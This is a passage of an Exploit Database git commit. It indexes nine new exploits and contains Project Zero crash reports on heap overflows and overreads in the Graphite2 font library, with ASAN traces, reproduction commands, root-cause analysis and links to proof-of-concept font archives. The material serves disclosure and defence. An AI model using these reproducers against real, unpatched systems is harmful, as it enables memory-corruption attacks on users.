From 2e7bce970215cba6169232ef421174c343d949c0 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 27 May 2016 05:03:14 +0000 Subject: [PATCH] DB: 2016-05-27 9 new exploits Real Estate Portal 4.1 - Multiple Vulnerabilities EduSec 4.2.5 - SQL Injection Micro Focus Rumba+ 9.4 - Multiple Stack Buffer Overflow Vulnerabilities HP Data Protector A.09.00 - Arbitrary Command Execution Graphite2 - GlyphCache::GlyphCache Heap-Based Buffer Overflow Graphite2 - GlyphCache::Loader Heap-Based Overreads Graphite2 - TtfUtil::CheckCmapSubtable12 Heap-Based Overread Graphite2 - TtfUtil::CmapSubtable4NextCodepoint Heap-Based Overread Graphite2 - NameTable::getName Multiple Heap-Based Out-of-Bounds Reads --- files.csv | 9 + platforms/multiple/dos/39859.txt | 132 ++++++++++ platforms/multiple/dos/39860.txt | 149 +++++++++++ platforms/multiple/dos/39861.txt | 76 ++++++ platforms/multiple/dos/39862.txt | 78 ++++++ platforms/multiple/dos/39863.txt | 138 ++++++++++ platforms/php/webapps/39855.txt | 86 ++++++ platforms/php/webapps/39856.txt | 78 ++++++ platforms/windows/dos/39857.txt | 417 ++++++++++++++++++++++++++++++ platforms/windows/remote/39858.py | 154 +++++++++++ 10 files changed, 1317 insertions(+) create mode 100755 platforms/multiple/dos/39859.txt create mode 100755 platforms/multiple/dos/39860.txt create mode 100755 platforms/multiple/dos/39861.txt create mode 100755 platforms/multiple/dos/39862.txt create mode 100755 platforms/multiple/dos/39863.txt create mode 100755 platforms/php/webapps/39855.txt create mode 100755 platforms/php/webapps/39856.txt create mode 100755 platforms/windows/dos/39857.txt create mode 100755 platforms/windows/remote/39858.py diff --git a/files.csv b/files.csv index 96c14a510..ab798995e 100755 --- a/files.csv +++ b/files.csv @@ -36038,3 +36038,12 @@ id,file,description,date,author,platform,type,port 39852,platforms/java/remote/39852.rb,"Oracle ATS Arbitrary File Upload",2016-05-25,metasploit,java,remote,8088 39853,platforms/unix/remote/39853.rb,"Ubiquiti airOS Arbitrary File Upload",2016-05-25,metasploit,unix,remote,443 39854,platforms/java/remote/39854.txt,"PowerFolder Server 10.4.321 - Remote Code Execution",2016-05-25,"Hans-Martin Muench",java,remote,0 +39855,platforms/php/webapps/39855.txt,"Real Estate Portal 4.1 - Multiple Vulnerabilities",2016-05-26,"Bikramaditya Guha",php,webapps,80 +39856,platforms/php/webapps/39856.txt,"EduSec 4.2.5 - SQL Injection",2016-05-26,"Bikramaditya Guha",php,webapps,80 +39857,platforms/windows/dos/39857.txt,"Micro Focus Rumba+ 9.4 - Multiple Stack Buffer Overflow Vulnerabilities",2016-05-26,LiquidWorm,windows,dos,0 +39858,platforms/windows/remote/39858.py,"HP Data Protector A.09.00 - Arbitrary Command Execution",2016-05-26,"Ian Lovering",windows,remote,0 +39859,platforms/multiple/dos/39859.txt,"Graphite2 - GlyphCache::GlyphCache Heap-Based Buffer Overflow",2016-05-26,"Google Security Research",multiple,dos,0 +39860,platforms/multiple/dos/39860.txt,"Graphite2 - GlyphCache::Loader Heap-Based Overreads",2016-05-26,"Google Security Research",multiple,dos,0 +39861,platforms/multiple/dos/39861.txt,"Graphite2 - TtfUtil::CheckCmapSubtable12 Heap-Based Overread",2016-05-26,"Google Security Research",multiple,dos,0 +39862,platforms/multiple/dos/39862.txt,"Graphite2 - TtfUtil::CmapSubtable4NextCodepoint Heap-Based Overread",2016-05-26,"Google Security Research",multiple,dos,0 +39863,platforms/multiple/dos/39863.txt,"Graphite2 - NameTable::getName Multiple Heap-Based Out-of-Bounds Reads",2016-05-26,"Google Security Research",multiple,dos,0 diff --git a/platforms/multiple/dos/39859.txt b/platforms/multiple/dos/39859.txt new file mode 100755 index 000000000..694e951bf --- /dev/null +++ b/platforms/multiple/dos/39859.txt @@ -0,0 +1,132 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=749 + +The following crash due to a heap-based buffer overflow can be observed in a slightly modified ASAN build of the standard Graphite2 gr2FontTest utility (git trunk), triggered with the following command: + +$ ./gr2fonttest /path/to/file text + +My change in gr2FontTest was to hardcode the tested text to include all characters in the 0x1..0xfff range, instead of having to specify them in command line. The patch is as follows: + +--- cut --- +--- graphite_original/gr2fonttest/gr2FontTest.cpp 2016-02-27 19:35:16.308071127 +0100 ++++ graphite/gr2fonttest/gr2FontTest.cpp 2016-02-26 13:57:13.389186376 +0100 +@@ -437,7 +437,17 @@ + if (mainArgOffset < 1) argError = true; + else if (mainArgOffset > 1) + { +- if (!useCodes && pText != NULL) ++ const unsigned int kCodeLimit = 0x1000; ++ ++ charLength = kCodeLimit - 1; ++ ++ pText32 = (unsigned int *)malloc(sizeof(unsigned int) * kCodeLimit); ++ for (unsigned int i = 1; i < kCodeLimit; ++i) { ++ pText32[i - 1] = i; ++ } ++ pText32[kCodeLimit - 1] = 0; ++ ++ /*if (!useCodes && pText != NULL) + { + charLength = convertUtf(pText, pText32); + if (!pText32) +@@ -466,7 +476,7 @@ + { + pText32[charLength] = 0; + fprintf(log, "\n"); +- } ++ }*/ + } + return (argError) ? false : true; + } +--- cut --- + +The resulting ASAN crash is as follows: + +--- cut --- +==27575==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000efd0 at pc 0x00000055daad bp 0x7ffdfb0bfe90 sp 0x7ffdfb0bfe88 +WRITE of size 8 at 0x60200000efd0 thread T0 + #0 0x55daac in graphite2::GlyphCache::GlyphCache(graphite2::Face const&, unsigned int) graphite/src/GlyphCache.cpp:133:20 + #1 0x549503 in graphite2::Face::readGlyphs(unsigned int) graphite/src/Face.cpp:98:29 + #2 0x56d3f4 in (anonymous namespace)::load_face(graphite2::Face&, unsigned int) graphite/src/gr_face.cpp:54:14 + #3 0x56cf04 in gr_make_face_with_ops graphite/src/gr_face.cpp:89:16 + #4 0x56f240 in gr_make_file_face graphite/src/gr_face.cpp:242:23 + #5 0x4ec193 in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ec193) + #6 0x4ef595 in main (graphite/gr2fonttest/gr2fonttest+0x4ef595) + +0x60200000efd1 is located 0 bytes to the right of 1-byte region [0x60200000efd0,0x60200000efd1) +allocated by thread T0 here: + #0 0x4b86dc in calloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:56 + #1 0x56ac8a in graphite2::GlyphFace const** graphite2::grzeroalloc(unsigned long) graphite/src/./inc/Main.h:96:28 + #2 0x55cb26 in graphite2::GlyphCache::GlyphCache(graphite2::Face const&, unsigned int) graphite/src/GlyphCache.cpp:119:45 + #3 0x549503 in graphite2::Face::readGlyphs(unsigned int) graphite/src/Face.cpp:98:29 + #4 0x56d3f4 in (anonymous namespace)::load_face(graphite2::Face&, unsigned int) graphite/src/gr_face.cpp:54:14 + #5 0x56cf04 in gr_make_face_with_ops graphite/src/gr_face.cpp:89:16 + #6 0x56f240 in gr_make_file_face graphite/src/gr_face.cpp:242:23 + #7 0x4ec193 in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ec193) + #8 0x4ef595 in main (graphite/gr2fonttest/gr2fonttest+0x4ef595) + +SUMMARY: AddressSanitizer: heap-buffer-overflow graphite/src/GlyphCache.cpp:133:20 in graphite2::GlyphCache::GlyphCache(graphite2::Face const&, unsigned int) +Shadow bytes around the buggy address: + 0x0c047fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c047fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c047fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c047fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c047fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +=>0x0c047fff9df0: fa fa 00 fa fa fa 01 fa fa fa[01]fa fa fa 00 04 + 0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c047fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c047fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==27575==ABORTING +--- cut --- + +A cursory analysis shows that the direct reason of the crash is the wrong assumption made by GlyphCache::GlyphCache() that the _num_glyphs field is always greater than 0. A buffer is allocated in line 128: + +--- cut --- + 128 GlyphFace * const glyphs = new GlyphFace [_num_glyphs]; +--- cut --- + +And regardless of the _num_glyphs value, data is written to its first entry in line 133: + +--- cut --- + 132 // The 0 glyph is definately required. + 133 _glyphs[0] = _glyph_loader->read_glyph(0, glyphs[0], &numsubs); +--- cut --- + +While this could just end as an off-by-one error and a fixed ~8 byte overflow, it gets worse. The subsequent loop in lines 139-140 also assumes that _num_glyphs is non-zero, and additionally wrongly (in the context of the misassumption) uses the != operator instead of < in the loop end condition: + +--- cut --- + 138 const GlyphFace * loaded = _glyphs[0]; + 139 for (uint16 gid = 1; loaded && gid != _num_glyphs; ++gid) + 140 _glyphs[gid] = loaded = _glyph_loader->read_glyph(gid, glyphs[gid], &numsubs); +--- cut --- + +This essentially means that the size of the overflown area is fully controlled by an attacker; it must only be a multiple of the native word size: typically 4 or 8 bytes. + +The bug was reported at https://bugzilla.mozilla.org/show_bug.cgi?id=1251869. Attached are three font files which trigger the crash. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39859.zip + diff --git a/platforms/multiple/dos/39860.txt b/platforms/multiple/dos/39860.txt new file mode 100755 index 000000000..80a2fd5b3 --- /dev/null +++ b/platforms/multiple/dos/39860.txt @@ -0,0 +1,149 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=751 + +The following crashes due to two different heap-based buffer overreads can be observed in an ASAN build of the standard Graphite2 gr2FontTest utility (git trunk), triggered with the following command: + +$ ./gr2fonttest /path/to/file -auto + +While we have seen the crashes to occur with six unique call stacks, eventually the OOB reads happen at two code locations: graphite2::GlyphCache::Loader::Loader (graphite/src/GlyphCache.cpp:306:38) and graphite2::GlyphCache::Loader::read_glyph (graphite/src/GlyphCache.cpp:398:27). Below you can see the ASAN reports of crashes in both functions: + +--- cut --- +================================================================= +==26347==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c00000bf40 at pc 0x00000055445d bp 0x7ffe231e8130 sp 0x7ffe231e8128 +READ of size 1 at 0x60c00000bf40 thread T0 + #0 0x55445c in unsigned long be::_peek<1>(unsigned char const*) graphite/src/./inc/Endian.h:77:73 + #1 0x5543c8 in unsigned long be::_peek<2>(unsigned char const*) graphite/src/./inc/Endian.h:50:43 + #2 0x551eab in unsigned short be::read(unsigned char const*&) graphite/src/./inc/Endian.h:60:23 + #3 0x562a66 in graphite2::GlyphCache::Loader::read_glyph(unsigned short, graphite2::GlyphFace&, int*) const graphite/src/GlyphCache.cpp:398:27 + #4 0x560481 in graphite2::GlyphCache::GlyphCache(graphite2::Face const&, unsigned int) graphite/src/GlyphCache.cpp:142:37 + #5 0x54bb13 in graphite2::Face::readGlyphs(unsigned int) graphite/src/Face.cpp:98:29 + #6 0x56fb34 in (anonymous namespace)::load_face(graphite2::Face&, unsigned int) graphite/src/gr_face.cpp:54:14 + #7 0x56f644 in gr_make_face_with_ops graphite/src/gr_face.cpp:89:16 + #8 0x571980 in gr_make_file_face graphite/src/gr_face.cpp:242:23 + #9 0x4ecf13 in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ecf13) + #10 0x4f0387 in main (graphite/gr2fonttest/gr2fonttest+0x4f0387) + +0x60c00000bf40 is located 0 bytes to the right of 128-byte region [0x60c00000bec0,0x60c00000bf40) +allocated by thread T0 here: + #0 0x4b85b8 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40 + #1 0x55dc0b in graphite2::FileFace::get_table_fn(void const*, unsigned int, unsigned long*) graphite/src/FileFace.cpp:94:11 + #2 0x54f8b1 in graphite2::Face::Table::Table(graphite2::Face const&, graphite2::TtfUtil::Tag, unsigned int) graphite/src/Face.cpp:280:36 + #3 0x567867 in graphite2::GlyphCache::Loader::Loader(graphite2::Face const&, bool) graphite/src/GlyphCache.cpp:268:24 + #4 0x55ef50 in graphite2::GlyphCache::GlyphCache(graphite2::Face const&, unsigned int) graphite/src/GlyphCache.cpp:118:21 + #5 0x54bb13 in graphite2::Face::readGlyphs(unsigned int) graphite/src/Face.cpp:98:29 + #6 0x56fb34 in (anonymous namespace)::load_face(graphite2::Face&, unsigned int) graphite/src/gr_face.cpp:54:14 + #7 0x56f644 in gr_make_face_with_ops graphite/src/gr_face.cpp:89:16 + #8 0x571980 in gr_make_file_face graphite/src/gr_face.cpp:242:23 + #9 0x4ecf13 in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ecf13) + #10 0x4f0387 in main (graphite/gr2fonttest/gr2fonttest+0x4f0387) + +SUMMARY: AddressSanitizer: heap-buffer-overflow graphite/src/./inc/Endian.h:77:73 in unsigned long be::_peek<1>(unsigned char const*) +Shadow bytes around the buggy address: + 0x0c187fff9790: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c187fff97a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c187fff97b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c187fff97c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c187fff97d0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 +=>0x0c187fff97e0: 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa + 0x0c187fff97f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 + 0x0c187fff9800: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c187fff9810: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c187fff9820: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c187fff9830: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==26347==ABORTING +--- cut --- + +--- cut --- +================================================================= +==26561==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000efb7 at pc 0x00000055445d bp 0x7ffc518d4260 sp 0x7ffc518d4258 +READ of size 1 at 0x60200000efb7 thread T0 + #0 0x55445c in unsigned long be::_peek<1>(unsigned char const*) graphite/src/./inc/Endian.h:77:73 + #1 0x5543c8 in unsigned long be::_peek<2>(unsigned char const*) graphite/src/./inc/Endian.h:50:43 + #2 0x554358 in unsigned long be::_peek<4>(unsigned char const*) graphite/src/./inc/Endian.h:50:43 + #3 0x551d6b in unsigned int be::read(unsigned char const*&) graphite/src/./inc/Endian.h:60:23 + #4 0x5685a5 in graphite2::GlyphCache::Loader::Loader(graphite2::Face const&, bool) graphite/src/GlyphCache.cpp:306:38 + #5 0x55ef50 in graphite2::GlyphCache::GlyphCache(graphite2::Face const&, unsigned int) graphite/src/GlyphCache.cpp:118:21 + #6 0x54bb13 in graphite2::Face::readGlyphs(unsigned int) graphite/src/Face.cpp:98:29 + #7 0x56fb34 in (anonymous namespace)::load_face(graphite2::Face&, unsigned int) graphite/src/gr_face.cpp:54:14 + #8 0x56f644 in gr_make_face_with_ops graphite/src/gr_face.cpp:89:16 + #9 0x571980 in gr_make_file_face graphite/src/gr_face.cpp:242:23 + #10 0x4ecf13 in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ecf13) + #11 0x4f0387 in main (graphite/gr2fonttest/gr2fonttest+0x4f0387) + +0x60200000efb7 is located 0 bytes to the right of 7-byte region [0x60200000efb0,0x60200000efb7) +allocated by thread T0 here: + #0 0x4b85b8 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40 + #1 0x55dc0b in graphite2::FileFace::get_table_fn(void const*, unsigned int, unsigned long*) graphite/src/FileFace.cpp:94:11 + #2 0x54f8b1 in graphite2::Face::Table::Table(graphite2::Face const&, graphite2::TtfUtil::Tag, unsigned int) graphite/src/Face.cpp:280:36 + #3 0x567867 in graphite2::GlyphCache::Loader::Loader(graphite2::Face const&, bool) graphite/src/GlyphCache.cpp:268:24 + #4 0x55ef50 in graphite2::GlyphCache::GlyphCache(graphite2::Face const&, unsigned int) graphite/src/GlyphCache.cpp:118:21 + #5 0x54bb13 in graphite2::Face::readGlyphs(unsigned int) graphite/src/Face.cpp:98:29 + #6 0x56fb34 in (anonymous namespace)::load_face(graphite2::Face&, unsigned int) graphite/src/gr_face.cpp:54:14 + #7 0x56f644 in gr_make_face_with_ops graphite/src/gr_face.cpp:89:16 + #8 0x571980 in gr_make_file_face graphite/src/gr_face.cpp:242:23 + #9 0x4ecf13 in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ecf13) + #10 0x4f0387 in main (graphite/gr2fonttest/gr2fonttest+0x4f0387) + +SUMMARY: AddressSanitizer: heap-buffer-overflow graphite/src/./inc/Endian.h:77:73 in unsigned long be::_peek<1>(unsigned char const*) +Shadow bytes around the buggy address: + 0x0c047fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c047fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c047fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c047fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c047fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +=>0x0c047fff9df0: fa fa fa fa fa fa[07]fa fa fa 06 fa fa fa 00 04 + 0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c047fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c047fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==26561==ABORTING +--- cut --- + +The bug was reported at https://bugzilla.mozilla.org/show_bug.cgi?id=1252406. Attached is an archive with three font files per each unique crash (in terms of stack trace). There are two directories with reproducers for the graphite2::GlyphCache::Loader::read_glyph crash and four directories with reproducers for graphite2::GlyphCache::Loader::Loader. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39860.zip + diff --git a/platforms/multiple/dos/39861.txt b/platforms/multiple/dos/39861.txt new file mode 100755 index 000000000..4b9e50e1a --- /dev/null +++ b/platforms/multiple/dos/39861.txt @@ -0,0 +1,76 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=752 + +The following crash due to a heap-based buffer overread can be observed in an ASAN build of the standard Graphite2 gr2FontTest utility (git trunk), triggered with the following command: + +$ ./gr2fonttest /path/to/file -auto + +--- cut --- +================================================================= +==27862==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61200000be45 at pc 0x0000005f3354 bp 0x7ffe1a7ac5b0 sp 0x7ffe1a7ac5a8 +READ of size 4 at 0x61200000be45 thread T0 + #0 0x5f3353 in graphite2::TtfUtil::CheckCmapSubtable12(void const*, void const*) graphite/src/TtfUtil.cpp:1092:40 + #1 0x4fa415 in smp_subtable(graphite2::Face::Table const&) graphite/src/CmapCache.cpp:55:9 + #2 0x4fa859 in graphite2::CachedCmap::CachedCmap(graphite2::Face const&) graphite/src/CmapCache.cpp:95:29 + #3 0x54bf42 in graphite2::Face::readGlyphs(unsigned int) graphite/src/Face.cpp:108:22 + #4 0x56fb34 in (anonymous namespace)::load_face(graphite2::Face&, unsigned int) graphite/src/gr_face.cpp:54:14 + #5 0x56f644 in gr_make_face_with_ops graphite/src/gr_face.cpp:89:16 + #6 0x571980 in gr_make_file_face graphite/src/gr_face.cpp:242:23 + #7 0x4ecf13 in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ecf13) + #8 0x4f0387 in main (graphite/gr2fonttest/gr2fonttest+0x4f0387) + +0x61200000be45 is located 1 bytes to the right of 260-byte region [0x61200000bd40,0x61200000be44) +allocated by thread T0 here: + #0 0x4b85b8 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40 + #1 0x55dc0b in graphite2::FileFace::get_table_fn(void const*, unsigned int, unsigned long*) graphite/src/FileFace.cpp:94:11 + #2 0x54f8b1 in graphite2::Face::Table::Table(graphite2::Face const&, graphite2::TtfUtil::Tag, unsigned int) graphite/src/Face.cpp:280:36 + #3 0x4fa793 in graphite2::CachedCmap::CachedCmap(graphite2::Face const&) graphite/src/CmapCache.cpp:91:23 + #4 0x54bf42 in graphite2::Face::readGlyphs(unsigned int) graphite/src/Face.cpp:108:22 + #5 0x56fb34 in (anonymous namespace)::load_face(graphite2::Face&, unsigned int) graphite/src/gr_face.cpp:54:14 + #6 0x56f644 in gr_make_face_with_ops graphite/src/gr_face.cpp:89:16 + #7 0x571980 in gr_make_file_face graphite/src/gr_face.cpp:242:23 + #8 0x4ecf13 in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ecf13) + #9 0x4f0387 in main (graphite/gr2fonttest/gr2fonttest+0x4f0387) + +SUMMARY: AddressSanitizer: heap-buffer-overflow graphite/src/TtfUtil.cpp:1092:40 in graphite2::TtfUtil::CheckCmapSubtable12(void const*, void const*) +Shadow bytes around the buggy address: + 0x0c247fff9770: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c247fff9780: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c247fff9790: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c247fff97a0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 + 0x0c247fff97b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +=>0x0c247fff97c0: 00 00 00 00 00 00 00 00[04]fa fa fa fa fa fa fa + 0x0c247fff97d0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 + 0x0c247fff97e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c247fff97f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa fa + 0x0c247fff9800: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c247fff9810: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==27862==ABORTING +--- cut --- + +The bug was reported at https://bugzilla.mozilla.org/show_bug.cgi?id=1252411. Attached are three font files which reproduce the crash. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39861.zip + diff --git a/platforms/multiple/dos/39862.txt b/platforms/multiple/dos/39862.txt new file mode 100755 index 000000000..9680ecc54 --- /dev/null +++ b/platforms/multiple/dos/39862.txt @@ -0,0 +1,78 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=755 + +The following crash due to a heap-based buffer overread can be observed in an ASAN build of the standard Graphite2 gr2FontTest utility (git trunk), triggered with the following command: + +$ ./gr2fonttest /path/to/file -auto + +--- cut --- +==19167==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60e00000dff1 at pc 0x000000553c7d bp 0x7ffc6c2c7100 sp 0x7ffc6c2c70f8 +READ of size 1 at 0x60e00000dff1 thread T0 + #0 0x553c7c in unsigned long be::_peek<1>(unsigned char const*) graphite/src/./inc/Endian.h:77:73 + #1 0x553be8 in unsigned long be::_peek<2>(unsigned char const*) graphite/src/./inc/Endian.h:50:43 + #2 0x56d7e3 in unsigned short be::peek(void const*) graphite/src/./inc/Endian.h:55:18 + #3 0x5f2bad in graphite2::TtfUtil::CmapSubtable4NextCodepoint(void const*, unsigned int, int*) graphite/src/TtfUtil.cpp:1042:16 + #4 0x4fce35 in bool cache_subtable<&graphite2::TtfUtil::CmapSubtable4NextCodepoint, &graphite2::TtfUtil::CmapSubtable4Lookup>(unsigned short**, void const*, unsigned int) graphite/src/CmapCache.cpp:65:33 + #5 0x4fb097 in graphite2::CachedCmap::CachedCmap(graphite2::Face const&) graphite/src/CmapCache.cpp:107:14 + #6 0x54b6d2 in graphite2::Face::readGlyphs(unsigned int) graphite/src/Face.cpp:108:22 + #7 0x56f5d4 in (anonymous namespace)::load_face(graphite2::Face&, unsigned int) graphite/src/gr_face.cpp:54:14 + #8 0x56f0e4 in gr_make_face_with_ops graphite/src/gr_face.cpp:89:16 + #9 0x571420 in gr_make_file_face graphite/src/gr_face.cpp:242:23 + #10 0x4ed0b3 in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ed0b3) + #11 0x4f06c9 in main (graphite/gr2fonttest/gr2fonttest+0x4f06c9) + +0x60e00000dff1 is located 0 bytes to the right of 145-byte region [0x60e00000df60,0x60e00000dff1) +allocated by thread T0 here: + #0 0x4b85b8 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40 + #1 0x55d42b in graphite2::FileFace::get_table_fn(void const*, unsigned int, unsigned long*) graphite/src/FileFace.cpp:94:11 + #2 0x54f0d1 in graphite2::Face::Table::Table(graphite2::Face const&, graphite2::TtfUtil::Tag, unsigned int) graphite/src/Face.cpp:281:36 + #3 0x4faad3 in graphite2::CachedCmap::CachedCmap(graphite2::Face const&) graphite/src/CmapCache.cpp:91:23 + #4 0x54b6d2 in graphite2::Face::readGlyphs(unsigned int) graphite/src/Face.cpp:108:22 + #5 0x56f5d4 in (anonymous namespace)::load_face(graphite2::Face&, unsigned int) graphite/src/gr_face.cpp:54:14 + #6 0x56f0e4 in gr_make_face_with_ops graphite/src/gr_face.cpp:89:16 + #7 0x571420 in gr_make_file_face graphite/src/gr_face.cpp:242:23 + #8 0x4ed0b3 in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ed0b3) + #9 0x4f06c9 in main (graphite/gr2fonttest/gr2fonttest+0x4f06c9) + +SUMMARY: AddressSanitizer: heap-buffer-overflow graphite/src/./inc/Endian.h:77:73 in unsigned long be::_peek<1>(unsigned char const*) +Shadow bytes around the buggy address: + 0x0c1c7fff9ba0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c1c7fff9bb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c1c7fff9bc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c1c7fff9bd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c1c7fff9be0: fa fa fa fa fa fa fa fa fa fa fa fa 00 00 00 00 +=>0x0c1c7fff9bf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[01]fa + 0x0c1c7fff9c00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c1c7fff9c10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c1c7fff9c20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c1c7fff9c30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c1c7fff9c40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: 